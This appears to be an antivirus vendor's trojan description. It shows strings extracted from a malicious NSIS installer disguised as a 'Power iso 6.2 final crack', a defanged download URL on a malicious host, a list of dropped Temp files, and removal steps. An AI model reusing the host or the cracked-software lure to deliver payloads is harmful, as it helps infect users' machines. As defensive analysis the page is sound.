ExecShell: success ("%s": file:"%s" params:"%s")ExecShell: warning: error ("%s": file:"%s" params:"%s")=%dExch: stack < %d elements
RMDir: "%s"
MessageBox: %d,"%s"
Delete: "%s"
File: wrote %d to "%s"
File: skipped: "%s" (overwriteflag=%d)
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename on reboot: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
SetFileAttributes: "%s":X
Sleep(%d)
detailprint: %s
Call: %d
Aborting: "%s"
Jump: %d
verifying installer: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
install.log
%u.%u%s%s
Skipping section: "%s"
Section: "%s"
New install of "%s" to "%s"
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
invalid registry key
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
x%c
RMDir: RemoveDirectory failed("%s")RMDir: RemoveDirectory on Reboot("%s")RMDir: RemoveDirectory("%s")RMDir: RemoveDirectory invalid input("%s")Delete: DeleteFile failed("%s")Delete: DeleteFile on Reboot("%s")Delete: DeleteFile("%s")%s: failed opening file "%s"
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp2.tmp\OoRnTsSavW.exe
tid=4422016&pid=1505&b_typ=pe&reb=1&name=Power iso 6.2 final crack [230815BAP]
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp2.tmp\NSISdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp2.tmp
ogram=sevenzip&tid=4422016&pid=1505&b_typ=pe&reb=1&name=Power iso 6.2 final crack [230815BAP]
Software\Microsoft\Windows\CurrentVersion\Internet Settings
callback%d
kernel32.dll
nsp2.tmp
Exec: success ("C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp2.tmp\OoRnTsSavW.exe").tmp\NSISdl.dll"
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp2.tmp\EYogau3uc3
zip&tid=4422016&pid=1505&b_typ=pe&reb=1&name=Power iso 6.2 final crack [230815BAP]
l.ic-free.xyz/stub_maker.php?program=sevenzip&tid=4422016&pid=1505&b_typ=pe&reb=1&name=Power iso 6.2 final crack [230815BAP]
c:\%original file name%.exe
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
201509162318
hXXp://dl.ic-free.xyz/stub_maker.php?program=sevenzip&tid=4422016&pid=1505&b_typ=pe&reb=1&name=Power iso 6.2 final crack [230815BAP]
OoRnTsSavW.exe_1620:
OoRnTsSavW.exe_1620_rwx_10001000_00007000:
cpSetup.exe_1136:
Remove it with Ad-Aware
- Click here to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\nsy4.tmp\NSISdl.dll (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy4.tmp\752024497 (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy4.tmp\nsArray.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy4.tmp\cpSetup.exe (4568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\EYogau3uc3 (147 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\NSISdl.dll (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\OoRnTsSavW.exe (11558 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00080d09.a (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf6.tmp (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000811bc.a (1690 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf7.tmp\b61595bf-da45-4e15-927c-f49de52b0e6d.dll (784 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.